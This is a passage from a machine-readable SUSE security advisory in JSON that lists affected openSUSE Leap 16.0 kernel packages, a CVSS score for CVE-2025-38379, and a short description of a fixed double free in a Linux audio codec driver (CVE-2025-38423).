"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38423",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38423"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd9375: Fix double free of regulator supplies\n\nDriver gets regulator supplies in probe path with\ndevm_regulator_bulk_get(), so should not call regulator_bulk_free() in\nerror and remove paths to avoid double free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
